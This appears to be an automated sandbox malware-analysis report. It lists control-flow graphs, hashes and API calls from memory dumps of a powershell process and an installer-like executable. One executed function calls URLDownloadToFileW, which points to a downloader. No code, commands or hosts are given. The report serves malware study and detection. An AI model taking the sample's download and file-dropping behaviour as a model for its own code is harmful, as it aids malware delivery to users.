                                                                              control_flow_graph 140 7fe897c566d-7fe897c5677 141 7fe897c5679 140->141 142 7fe897c567e-7fe897c568f 140->142 141->142 143 7fe897c567b 141->143 144 7fe897c5696-7fe897c56a7 142->144 145 7fe897c5691 142->145 143->142 147 7fe897c56a9 144->147 148 7fe897c56ae-7fe897c56bf 144->148 145->144 146 7fe897c5693 145->146 149 7fe897c5695 146->149 147->148 150 7fe897c56ab 147->150 151 7fe897c56c6-7fe897c56d7 148->151 152 7fe897c56c1 148->152 149->144 150->148 153 7fe897c56d9 151->153 154 7fe897c56de-7fe897c56f1 151->154 152->151 155 7fe897c56c3 152->155 153->154 156 7fe897c56db 153->156 154->149 157 7fe897c56f3 154->157 155->151 156->154 158 7fe897c56f5-7fe897c5720 157->158 159 7fe897c5778-7fe897c579a 158->159 160 7fe897c5722-7fe897c576a 158->160 161 7fe897c5903-7fe897c59cc 159->161 162 7fe897c57a0-7fe897c57aa 159->162 160->158 173 7fe897c576c-7fe897c5777 160->173 164 7fe897c57ac-7fe897c57b9 162->164 165 7fe897c57c3-7fe897c57c8 162->165 164->165 170 7fe897c57bb-7fe897c57c1 164->170 166 7fe897c58a3-7fe897c58ad 165->166 167 7fe897c57ce-7fe897c57d1 165->167 174 7fe897c58af-7fe897c58bd 166->174 175 7fe897c58be-7fe897c58ce 166->175 171 7fe897c5816 167->171 172 7fe897c57d3-7fe897c57e2 167->172 170->165 177 7fe897c5818-7fe897c581a 171->177 172->161 184 7fe897c57e8-7fe897c57f2 172->184 173->159 178 7fe897c58db-7fe897c5900 175->178 179 7fe897c58d0-7fe897c58d4 175->179 177->166 182 7fe897c5820-7fe897c5826 177->182 178->161 179->178 186 7fe897c5828-7fe897c5835 182->186 187 7fe897c5842-7fe897c5884 182->187 188 7fe897c580b-7fe897c5814 184->188 189 7fe897c57f4-7fe897c5801 184->189 186->187 190 7fe897c5837-7fe897c5840 186->190 198 7fe897c588a-7fe897c58a2 187->198 188->177 189->188 192 7fe897c5803-7fe897c5809 189->192 190->187 192->188
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0cd$V
                                                                              • API String ID: 0-2552750534
                                                                              • Opcode ID: 99115bf8e977ee9a1eb2307f72bb0cfcd32c596e52009ac603bf7a279eda6368
                                                                              • Instruction ID: ee42a290cadeef6c339469918df5c84d05fe9cb5111aa305d8e30eb10cf1ae4c
                                                                              • Opcode Fuzzy Hash: 99115bf8e977ee9a1eb2307f72bb0cfcd32c596e52009ac603bf7a279eda6368
                                                                              • Instruction Fuzzy Hash: FDD1353080E7C95FE347973898146B67FA0EF97664F0901EBD08DCB0A3D616AD56C3A2
                                                                              Function 000007FE897C10D3 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 200 7fe897c10d3-7fe897c10dc 201 7fe897c10ed-7fe897c110a 200->201 202 7fe897c10de-7fe897c10e9 200->202 203 7fe897c110c-7fe897c1124 201->203 204 7fe897c1095-7fe897c1097 201->204 202->201 205 7fe897c112a-7fe897c119e 203->205 206 7fe897c11c1-7fe897c11cb 203->206 216 7fe897c11a6-7fe897c11be 205->216 207 7fe897c11cd-7fe897c11d7 206->207 208 7fe897c11d8-7fe897c11e8 206->208 209 7fe897c11ea-7fe897c11ee 208->209 210 7fe897c11f5-7fe897c121a 208->210 209->210 216->206
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8h$xF\
                                                                              • API String ID: 0-2464866062
                                                                              • Opcode ID: 1a092dc708188cbfa05169059a83f2a76a14dbc10d63acbcaf733256f0ef8470
                                                                              • Instruction ID: beb0351726b80649830ba7b17d776053a15c77e1cb2773c6849537860cd0f1a0
                                                                              • Opcode Fuzzy Hash: 1a092dc708188cbfa05169059a83f2a76a14dbc10d63acbcaf733256f0ef8470
                                                                              • Instruction Fuzzy Hash: 8F41D51170EBC90FE34B937C28646657FE1DF8B259B2901EBD58ECB2A3D9094C56C361
                                                                              Function 000007FE896F7AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 217 7fe896f7ae1-7fe896f7aef 218 7fe896f7af1 217->218 219 7fe896f7af2-7fe896f7b05 217->219 218->219 220 7fe896f7b07 219->220 221 7fe896f7b08-7fe896f7b19 219->221 220->221 222 7fe896f7b1b 221->222 223 7fe896f7b1c-7fe896f7ba1 221->223 222->223 227 7fe896f7ba3-7fe896f7ba8 223->227 228 7fe896f7bab-7fe896f7bb1 223->228 227->228 229 7fe896f7bb3-7fe896f7bb8 228->229 230 7fe896f7bbb-7fe896f7bfe URLDownloadToFileW 228->230 229->230 232 7fe896f7c00 230->232 233 7fe896f7c06-7fe896f7c23 230->233 232->233
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.453910656.000007FE896F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE896F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe896f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: DownloadFile
                                                                              • String ID:
                                                                              • API String ID: 1407266417-0
                                                                              • Opcode ID: 5100bbc1bad8f56534a62f7f476b27dfe0760508145f6cea8c5f0cd1ee9f7337
                                                                              • Instruction ID: 18cee8f71256a1a4148150c660949547350a4cee3570eb2db5a837fde509c41d
                                                                              • Opcode Fuzzy Hash: 5100bbc1bad8f56534a62f7f476b27dfe0760508145f6cea8c5f0cd1ee9f7337
                                                                              • Instruction Fuzzy Hash: E241F57080DB889FDB1ADF5898447EABBF0FB56321F0482AFD089D3552CB646806C782
                                                                              Function 000007FE896F7C25 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 245 7fe896f7c25-7fe896f7c31 246 7fe896f7c33-7fe896f7c3b 245->246 247 7fe896f7c3c-7fe896f7c51 245->247 246->247 248 7fe896f7c53-7fe896f7c70 247->248 249 7fe896f7bed-7fe896f7bf2 URLDownloadToFileW 247->249 250 7fe896f7bf3-7fe896f7bfe 248->250 255 7fe896f7c72-7fe896f7c86 248->255 249->250 251 7fe896f7c00 250->251 252 7fe896f7c06-7fe896f7c23 250->252 251->252 258 7fe896f7c8d-7fe896f7cb9 255->258 261 7fe896f7c83-7fe896f7c86 258->261 262 7fe896f7cbb-7fe896f7ce3 258->262 261->258
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.453910656.000007FE896F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE896F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe896f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b2d2d648f39dff3df7b0ed9fcadbbd4817ff88e7169651ff95486d589b1b0a5
                                                                              • Instruction ID: 6f4c90c58aebe724748d68bbc80ba4ddc01a873e7c691593fb7aafa86aae8f67
                                                                              • Opcode Fuzzy Hash: 9b2d2d648f39dff3df7b0ed9fcadbbd4817ff88e7169651ff95486d589b1b0a5
                                                                              • Instruction Fuzzy Hash: 2F21D32190E3D25FE7076738A8622E87FA0EF03234F0951E7D098CA4E3D619745AC3A7

                                                                              Non-executed Functions

                                                                              Function 000007FE897C352E Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0cd$h.b
                                                                              • API String ID: 0-4021534375
                                                                              • Opcode ID: 06f19f6db49b33ce595c4f04ce4946d021b9f3fc008e1c2ec59ef0f431dfe587
                                                                              • Instruction ID: 027382dbfd343ee77e92ee2405842fb98a7886356ba91ce59664880e13b7f10b
                                                                              • Opcode Fuzzy Hash: 06f19f6db49b33ce595c4f04ce4946d021b9f3fc008e1c2ec59ef0f431dfe587
                                                                              • Instruction Fuzzy Hash: 9FA16B2080EBC90FD747977858246A67FF0EF87358F1901EBD48DCB1A3D619991AC362
                                                                              Function 000007FE897C3A81 Relevance: 9.0, Strings: 7, Instructions: 231COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 465 7fe897c3a81-7fe897c3a8d 466 7fe897c3a8f 465->466 467 7fe897c3a90-7fe897c3aa1 465->467 466->467 468 7fe897c3aa3 467->468 469 7fe897c3aa4-7fe897c3acc 467->469 468->469 470 7fe897c3b06-7fe897c3b0e 469->470 471 7fe897c3ace-7fe897c3ad4 469->471 473 7fe897c3b10-7fe897c3b2d 470->473 472 7fe897c3ad6-7fe897c3b05 471->472 471->473 472->470 474 7fe897c3b44 473->474 475 7fe897c3b2f-7fe897c3b42 473->475 476 7fe897c3b46-7fe897c3b48 474->476 475->476 478 7fe897c3c28-7fe897c3c32 476->478 479 7fe897c3b4e-7fe897c3b51 476->479 482 7fe897c3c34-7fe897c3c3e 478->482 483 7fe897c3c3f-7fe897c3c4f 478->483 480 7fe897c3b68 479->480 481 7fe897c3b53-7fe897c3b66 479->481 484 7fe897c3b6a-7fe897c3b6c 480->484 481->484 485 7fe897c3c5c-7fe897c3c80 483->485 486 7fe897c3c51-7fe897c3c55 483->486 484->478 487 7fe897c3b72-7fe897c3b7f 484->487 486->485 488 7fe897c3b93-7fe897c3ba3 487->488 489 7fe897c3b81-7fe897c3b8c 487->489 491 7fe897c3bb7-7fe897c3be5 488->491 492 7fe897c3ba5-7fe897c3bb0 488->492 489->488 494 7fe897c3be7-7fe897c3bfe 491->494 495 7fe897c3c00-7fe897c3c10 491->495 492->491 498 7fe897c3c17-7fe897c3c27 494->498 495->498
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Xh)$h.b$h.b$h.b$h.b$h.b$h.b
                                                                              • API String ID: 0-172823724
                                                                              • Opcode ID: cb18efb7b10bf9775f08755d62cb22f647dbfca95c584950073f454b84496c8f
                                                                              • Instruction ID: 868568050089fa2c9eb94ef50819ca68e966e5148a7f0fcb30688462ff856a3e
                                                                              • Opcode Fuzzy Hash: cb18efb7b10bf9775f08755d62cb22f647dbfca95c584950073f454b84496c8f
                                                                              • Instruction Fuzzy Hash: E161161190EBCA4FD757973C18602BA7FA1EF87288F1900E7D089CB0E3D5196819D362
                                                                              Function 000007FE897C380A Relevance: 6.5, Strings: 5, Instructions: 279COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 656 7fe897c380a-7fe897c3812 657 7fe897c3815-7fe897c388a 656->657 657->657 658 7fe897c388c-7fe897c38b0 657->658 659 7fe897c38e9-7fe897c38f0 658->659 660 7fe897c38b2-7fe897c38b8 658->660 662 7fe897c38f1-7fe897c390f 659->662 661 7fe897c38ba-7fe897c38e8 660->661 660->662 661->659 664 7fe897c3926 662->664 665 7fe897c3911-7fe897c3924 662->665 667 7fe897c3928-7fe897c392a 664->667 665->667 668 7fe897c39da-7fe897c39e4 667->668 669 7fe897c3930-7fe897c3933 667->669 670 7fe897c39e6-7fe897c39f2 668->670 671 7fe897c39f3-7fe897c3a03 668->671 669->668 672 7fe897c3939-7fe897c3941 669->672 675 7fe897c3a05-7fe897c3a09 671->675 676 7fe897c3a10-7fe897c3a36 671->676 673 7fe897c3943-7fe897c394d 672->673 674 7fe897c3951 672->674 677 7fe897c396d-7fe897c39d9 673->677 678 7fe897c394f 673->678 679 7fe897c3956-7fe897c3963 674->679 675->676 678->679 679->677 681 7fe897c3965-7fe897c396b 679->681 681->677
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.454040006.000007FE897C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE897C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7fe897c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 88"$Xh)$`k_$h.b$h.b
                                                                              • API String ID: 0-2335438108
                                                                              • Opcode ID: f82f18ff2df51aa5054f0735a64222bd3808b2100b505690260bf9c93acd23eb
                                                                              • Instruction ID: bbb4eb2b1d1d9304c0cd9ccf06b6480a0d399e6ca592a9c29acbf376be65fc2b
                                                                              • Opcode Fuzzy Hash: f82f18ff2df51aa5054f0735a64222bd3808b2100b505690260bf9c93acd23eb
                                                                              • Instruction Fuzzy Hash: 8B81022190EBD60FE753937858216A67FF1DF47294B1E41EBC0C9CB1A3D50A9C4AC362

                                                                              Execution Graph

                                                                              Execution Coverage:23.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:14.9%
                                                                              Total number of Nodes:1364
                                                                              Total number of Limit Nodes:38
                                                                              execution_graph 3279 4015c1 3280 402c37 18 API calls 3279->3280 3281 4015c8 3280->3281 3298 405bc8 CharNextW CharNextW 3281->3298 3283 401631 3285 401663 3283->3285 3286 401636 3283->3286 3284 405b4a CharNextW 3294 4015d1 3284->3294 3289 401423 25 API calls 3285->3289 3312 401423 3286->3312 3296 40165b 3289->3296 3293 40164a SetCurrentDirectoryW 3293->3296 3294->3283 3294->3284 3295 401617 GetFileAttributesW 3294->3295 3304 405819 3294->3304 3307 40577f CreateDirectoryW 3294->3307 3316 4057fc CreateDirectoryW 3294->3316 3295->3294 3299 405be5 3298->3299 3300 405bf7 3298->3300 3299->3300 3301 405bf2 CharNextW 3299->3301 3302 405c1b 3300->3302 3303 405b4a CharNextW 3300->3303 3301->3302 3302->3294 3303->3300 3319 406626 GetModuleHandleA 3304->3319 3308 4057d0 GetLastError 3307->3308 3309 4057cc 3307->3309 3308->3309 3310 4057df SetFileSecurityW 3308->3310 3309->3294 3310->3309 3311 4057f5 GetLastError 3310->3311 3311->3309 3313 4052b0 25 API calls 3312->3313 3314 401431 3313->3314 3315 40624c lstrcpynW 3314->3315 3315->3293 3317 405810 GetLastError 3316->3317 3318 40580c 3316->3318 3317->3318 3318->3294 3320 406642 3319->3320 3321 40664c GetProcAddress 3319->3321 3325 4065b6 GetSystemDirectoryW 3320->3325 3322 405820 3321->3322 3322->3294 3324 406648 3324->3321 3324->3322 3326 4065d8 wsprintfW LoadLibraryExW 3325->3326 3326->3324 3328 401941 3329 401943 3328->3329 3330 402c37 18 API calls 3329->3330 3331 401948 3330->3331 3334 40595a 3331->3334 3373 405c25 3334->3373 3337 405982 DeleteFileW 3342 401951 3337->3342 3338 405999 3340 405ab9 3338->3340 3387 40624c lstrcpynW 3338->3387 3340->3342 3405 40658f FindFirstFileW 3340->3405 3341 4059bf 3343 4059d2 3341->3343 3344 4059c5 lstrcatW 3341->3344 3388 405b69 lstrlenW 3343->3388 3345 4059d8 3344->3345 3348 4059e8 lstrcatW 3345->3348 3350 4059f3 lstrlenW FindFirstFileW 3345->3350 3348->3350 3350->3340 3358 405a15 3350->3358 3351 405ae2 3408 405b1d lstrlenW CharPrevW 3351->3408 3354 405a9c FindNextFileW 3354->3358 3359 405ab2 FindClose 3354->3359 3355 405912 5 API calls 3357 405af4 3355->3357 3360 405af8 3357->3360 3361 405b0e 3357->3361 3358->3354 3368 405a5d 3358->3368 3392 40624c lstrcpynW 3358->3392 3359->3340 3360->3342 3364 4052b0 25 API calls 3360->3364 3363 4052b0 25 API calls 3361->3363 3363->3342 3366 405b05 3364->3366 3365 40595a 61 API calls 3365->3368 3367 406012 37 API calls 3366->3367 3370 405b0c 3367->3370 3368->3354 3368->3365 3369 4052b0 25 API calls 3368->3369 3371 4052b0 25 API calls 3368->3371 3393 405912 3368->3393 3401 406012 MoveFileExW 3368->3401 3369->3354 3370->3342 3371->3368 3411 40624c lstrcpynW 3373->3411 3375 405c36 3376 405bc8 4 API calls 3375->3376 3377 405c3c 3376->3377 3378 40597a 3377->3378 3379 4064e0 5 API calls 3377->3379 3378->3337 3378->3338 3385 405c4c 3379->3385 3380 405c7d lstrlenW 3381 405c88 3380->3381 3380->3385 3383 405b1d 3 API calls 3381->3383 3382 40658f 2 API calls 3382->3385 3384 405c8d GetFileAttributesW 3383->3384 3384->3378 3385->3378 3385->3380 3385->3382 3386 405b69 2 API calls 3385->3386 3386->3380 3387->3341 3389 405b77 3388->3389 3390 405b89 3389->3390 3391 405b7d CharPrevW 3389->3391 3390->3345 3391->3389 3391->3390 3392->3358 3412 405d19 GetFileAttributesW 3393->3412 3396 405935 DeleteFileW 3399 40593b 3396->3399 3397 40592d RemoveDirectoryW 3397->3399 3398 40593f 3398->3368 3399->3398 3400 40594b SetFileAttributesW 3399->3400 3400->3398 3402 406033 3401->3402 3403 406026 3401->3403 3402->3368 3415 405e98 3403->3415 3406 405ade 3405->3406 3407 4065a5 FindClose 3405->3407 3406->3342 3406->3351 3407->3406 3409 405ae8 3408->3409 3410 405b39 lstrcatW 3408->3410 3409->3355 3410->3409 3411->3375 3413 40591e 3412->3413 3414 405d2b SetFileAttributesW 3412->3414 3413->3396 3413->3397 3413->3398 3414->3413 3416 405ec8 3415->3416 3417 405eee GetShortPathNameW 3415->3417 3442 405d3e GetFileAttributesW CreateFileW 3416->3442 3418 405f03 3417->3418 3419 40600d 3417->3419 3418->3419 3421 405f0b wsprintfA 3418->3421 3419->3402 3423 40626e 18 API calls 3421->3423 3422 405ed2 CloseHandle GetShortPathNameW 3422->3419 3424 405ee6 3422->3424 3425 405f33 3423->3425 3424->3417 3424->3419 3443 405d3e GetFileAttributesW CreateFileW 3425->3443 3427 405f40 3427->3419 3428 405f4f GetFileSize GlobalAlloc 3427->3428 3429 405f71 3428->3429 3430 406006 CloseHandle 3428->3430 3444 405dc1 ReadFile 3429->3444 3430->3419 3435 405f90 lstrcpyA 3438 405fb2 3435->3438 3436 405fa4 3437 405ca3 4 API calls 3436->3437 3437->3438 3439 405fe9 SetFilePointer 3438->3439 3451 405df0 WriteFile 3439->3451 3442->3422 3443->3427 3445 405ddf 3444->3445 3445->3430 3446 405ca3 lstrlenA 3445->3446 3447 405ce4 lstrlenA 3446->3447 3448 405cbd lstrcmpiA 3447->3448 3449 405cec 3447->3449 3448->3449 3450 405cdb CharNextA 3448->3450 3449->3435 3449->3436 3450->3447 3452 405e0e GlobalFree 3451->3452 3452->3430 3463 401e43 3471 402c15 3463->3471 3465 401e49 3466 402c15 18 API calls 3465->3466 3467 401e55 3466->3467 3468 401e61 ShowWindow 3467->3468 3469 401e6c EnableWindow 3467->3469 3470 402abf 3468->3470 3469->3470 3472 40626e 18 API calls 3471->3472 3473 402c2a 3472->3473 3473->3465 4114 402644 4115 402c15 18 API calls 4114->4115 4122 402653 4115->4122 4116 402790 4117 40269d ReadFile 4117->4116 4117->4122 4118 405dc1 ReadFile 4118->4122 4119 402792 4136 406193 wsprintfW 4119->4136 4120 4026dd MultiByteToWideChar 4120->4122 4122->4116 4122->4117 4122->4118 4122->4119 4122->4120 4124 402703 SetFilePointer MultiByteToWideChar 4122->4124 4126 4027a3 4122->4126 4127 405e1f SetFilePointer 4122->4127 4124->4122 4125 4027c4 SetFilePointer 4125->4116 4126->4116 4126->4125 4128 405e3b 4127->4128 4133 405e57 4127->4133 4129 405dc1 ReadFile 4128->4129 4130 405e47 4129->4130 4131 405e60 SetFilePointer 4130->4131 4132 405e88 SetFilePointer 4130->4132 4130->4133 4131->4132 4134 405e6b 4131->4134 4132->4133 4133->4122 4135 405df0 WriteFile 4134->4135 4135->4133 4136->4116 3488 402348 3489 402c37 18 API calls 3488->3489 3490 402357 3489->3490 3491 402c37 18 API calls 3490->3491 3492 402360 3491->3492 3493 402c37 18 API calls 3492->3493 3494 40236a GetPrivateProfileStringW 3493->3494 4147 4016cc 4148 402c37 18 API calls 4147->4148 4149 4016d2 GetFullPathNameW 4148->4149 4150 4016ec 4149->4150 4151 40170e 4149->4151 4150->4151 4154 40658f 2 API calls 4150->4154 4152 401723 GetShortPathNameW 4151->4152 4153 402abf 4151->4153 4152->4153 4155 4016fe 4154->4155 4155->4151 4157 40624c lstrcpynW 4155->4157 4157->4151 4158 401b4d 4159 402c37 18 API calls 4158->4159 4160 401b54 4159->4160 4161 402c15 18 API calls 4160->4161 4162 401b5d wsprintfW 4161->4162 4163 402abf 4162->4163 4164 401f52 4165 402c37 18 API calls 4164->4165 4166 401f59 4165->4166 4167 40658f 2 API calls 4166->4167 4168 401f5f 4167->4168 4170 401f70 4168->4170 4171 406193 wsprintfW 4168->4171 4171->4170 4172 402253 4173 402c37 18 API calls 4172->4173 4174 402259 4173->4174 4175 402c37 18 API calls 4174->4175 4176 402262 4175->4176 4177 402c37 18 API calls 4176->4177 4178 40226b 4177->4178 4179 40658f 2 API calls 4178->4179 4180 402274 4179->4180 4181 402285 lstrlenW lstrlenW 4180->4181 4185 402278 4180->4185 4183 4052b0 25 API calls 4181->4183 4182 4052b0 25 API calls 4186 402280 4182->4186 4184 4022c3 SHFileOperationW 4183->4184 4184->4185 4184->4186 4185->4182 4185->4186 4187 401956 4188 402c37 18 API calls 4187->4188 4189 40195d lstrlenW 4188->4189 4190 40258c 4189->4190 4191 406956 4192 4067da 4191->4192 4193 407145 4192->4193 4194 406864 GlobalAlloc 4192->4194 4195 40685b GlobalFree 4192->4195 4196 4068d2 GlobalFree 4192->4196 4197 4068db GlobalAlloc 4192->4197 4194->4192 4194->4193 4195->4194 4196->4197 4197->4192 4197->4193 4198 401d57 GetDlgItem GetClientRect 4199 402c37 18 API calls 4198->4199 4200 401d89 LoadImageW SendMessageW 4199->4200 4201 401da7 DeleteObject 4200->4201 4202 402abf 4200->4202 4201->4202 4203 402dd7 4204 402de9 SetTimer 4203->4204 4206 402e02 4203->4206 4204->4206 4205 402e57 4206->4205 4207 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4206->4207 4207->4205 4208 4014d7 4209 402c15 18 API calls 4208->4209 4210 4014dd Sleep 4209->4210 4212 402abf 4210->4212 4213 4022d7 4214 4022de 4213->4214 4217 4022f1 4213->4217 4215 40626e 18 API calls 4214->4215 4216 4022eb 4215->4216 4218 4058ae MessageBoxIndirectW 4216->4218 4218->4217 3821 40175c 3822 402c37 18 API calls 3821->3822 3823 401763 3822->3823 3827 405d6d 3823->3827 3825 40176a 3826 405d6d 2 API calls 3825->3826 3826->3825 3828 405d7a GetTickCount GetTempFileNameW 3827->3828 3829 405db0 3828->3829 3830 405db4 3828->3830 3829->3828 3829->3830 3830->3825 4061 4023de 4062 402c37 18 API calls 4061->4062 4063 4023f0 4062->4063 4064 402c37 18 API calls 4063->4064 4065 4023fa 4064->4065 4078 402cc7 4065->4078 4068 402885 4069 402432 4070 40243e 4069->4070 4072 402c15 18 API calls 4069->4072 4073 40245d RegSetValueExW 4070->4073 4075 4030fa 36 API calls 4070->4075 4071 402c37 18 API calls 4074 402428 lstrlenW 4071->4074 4072->4070 4076 402473 RegCloseKey 4073->4076 4074->4069 4075->4073 4076->4068 4079 402ce2 4078->4079 4082 4060e7 4079->4082 4083 4060f6 4082->4083 4084 406101 RegCreateKeyExW 4083->4084 4085 40240a 4083->4085 4084->4085 4085->4068 4085->4069 4085->4071 4219 4047de CoTaskMemFree 4220 405b1d 3 API calls 4219->4220 4221 4047f1 4220->4221 4222 404828 SetDlgItemTextW 4221->4222 4224 40626e 18 API calls 4221->4224 4223 404843 4222->4223 4256 4049eb 4223->4256 4258 405892 GetDlgItemTextW 4223->4258 4225 404810 lstrcmpiW 4224->4225 4225->4222 4227 404821 lstrcatW 4225->4227 4227->4222 4228 404248 8 API calls 4230 4049ff 4228->4230 4229 40486c 4231 405c25 18 API calls 4229->4231 4232 404872 4231->4232 4259 40624c lstrcpynW 4232->4259 4234 404889 4235 406626 5 API calls 4234->4235 4241 404890 4235->4241 4236 4048d1 4260 40624c lstrcpynW 4236->4260 4238 4048d8 4239 405bc8 4 API calls 4238->4239 4240 4048de GetDiskFreeSpaceW 4239->4240 4243 404902 MulDiv 4240->4243 4245 404929 4240->4245 4241->4236 4244 405b69 2 API calls 4241->4244 4241->4245 4243->4245 4244->4241 4246 40499a 4245->4246 4261 404b35 4245->4261 4248 4049bd 4246->4248 4250 40140b 2 API calls 4246->4250 4272 404203 KiUserCallbackDispatcher 4248->4272 4250->4248 4251 40499c SetDlgItemTextW 4251->4246 4252 40498c 4264 404a6c 4252->4264 4255 4049d9 4255->4256 4273 404609 4255->4273 4256->4228 4258->4229 4259->4234 4260->4238 4262 404a6c 21 API calls 4261->4262 4263 404987 4262->4263 4263->4251 4263->4252 4265 404a85 4264->4265 4266 40626e 18 API calls 4265->4266 4267 404ae9 4266->4267 4268 40626e 18 API calls 4267->4268 4269 404af4 4268->4269 4270 40626e 18 API calls 4269->4270 4271 404b0a lstrlenW wsprintfW SetDlgItemTextW 4270->4271 4271->4246 4272->4255 4274 404617 4273->4274 4275 40461c SendMessageW 4273->4275 4274->4275 4275->4256 3453 402862 3454 402c37 18 API calls 3453->3454 3455 402869 FindFirstFileW 3454->3455 3456 402891 3455->3456 3457 40287c 3455->3457 3461 406193 wsprintfW 3456->3461 3459 40289a 3462 40624c lstrcpynW 3459->3462 3461->3459 3462->3457 4283 401563 4284 402a65 4283->4284 4287 406193 wsprintfW 4284->4287 4286 402a6a 4287->4286 4288 401968 4289 402c15 18 API calls 4288->4289 4290 40196f 4289->4290 4291 402c15 18 API calls 4290->4291 4292 40197c 4291->4292 4293 402c37 18 API calls 4292->4293 4294 401993 lstrlenW 4293->4294 4295 4019a4 4294->4295 4296 4019e5 4295->4296 4300 40624c lstrcpynW 4295->4300 4298 4019d5 4298->4296 4299 4019da lstrlenW 4298->4299 4299->4296 4300->4298 4301 404669 4302 404679 4301->4302 4303 40469f 4301->4303 4304 4041e1 19 API calls 4302->4304 4305 404248 8 API calls 4303->4305 4306 404686 SetDlgItemTextW 4304->4306 4307 4046ab 4305->4307 4306->4303 4308 4027e9 4309 4027f0 4308->4309 4312 402a6a 4308->4312 4310 402c15 18 API calls 4309->4310 4311 4027f7 4310->4311 4313 402806 SetFilePointer 4311->4313 4313->4312 4314 402816 4313->4314 4316 406193 wsprintfW 4314->4316 4316->4312 4317 40166a 4318 402c37 18 API calls 4317->4318 4319 401670 4318->4319 4320 40658f 2 API calls 4319->4320 4321 401676 4320->4321 4322 401ced 4323 402c15 18 API calls 4322->4323 4324 401cf3 IsWindow 4323->4324 4325 401a20 4324->4325 3636 4053ef 3637 405410 GetDlgItem GetDlgItem GetDlgItem 3636->3637 3638 405599 3636->3638 3681 404216 SendMessageW 3637->3681 3640 4055a2 GetDlgItem CreateThread CloseHandle 3638->3640 3641 4055ca 3638->3641 3640->3641 3684 405383 OleInitialize 3640->3684 3642 4055f5 3641->3642 3644 4055e1 ShowWindow ShowWindow 3641->3644 3645 40561a 3641->3645 3646 405655 3642->3646 3648 405609 3642->3648 3649 40562f ShowWindow 3642->3649 3643 405480 3651 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3643->3651 3683 404216 SendMessageW 3644->3683 3650 404248 8 API calls 3645->3650 3646->3645 3654 405663 SendMessageW 3646->3654 3655 4041ba SendMessageW 3648->3655 3657 405641 3649->3657 3658 40564f 3649->3658 3656 405628 3650->3656 3652 4054f5 3651->3652 3653 4054d9 SendMessageW SendMessageW 3651->3653 3659 405508 3652->3659 3660 4054fa SendMessageW 3652->3660 3653->3652 3654->3656 3661 40567c CreatePopupMenu 3654->3661 3655->3645 3662 4052b0 25 API calls 3657->3662 3663 4041ba SendMessageW 3658->3663 3665 4041e1 19 API calls 3659->3665 3660->3659 3664 40626e 18 API calls 3661->3664 3662->3658 3663->3646 3666 40568c AppendMenuW 3664->3666 3667 405518 3665->3667 3668 4056a9 GetWindowRect 3666->3668 3669 4056bc TrackPopupMenu 3666->3669 3670 405521 ShowWindow 3667->3670 3671 405555 GetDlgItem SendMessageW 3667->3671 3668->3669 3669->3656 3672 4056d7 3669->3672 3673 405544 3670->3673 3674 405537 ShowWindow 3670->3674 3671->3656 3675 40557c SendMessageW SendMessageW 3671->3675 3676 4056f3 SendMessageW 3672->3676 3682 404216 SendMessageW 3673->3682 3674->3673 3675->3656 3676->3676 3677 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3676->3677 3679 405735 SendMessageW 3677->3679 3679->3679 3680 40575e GlobalUnlock SetClipboardData CloseClipboard 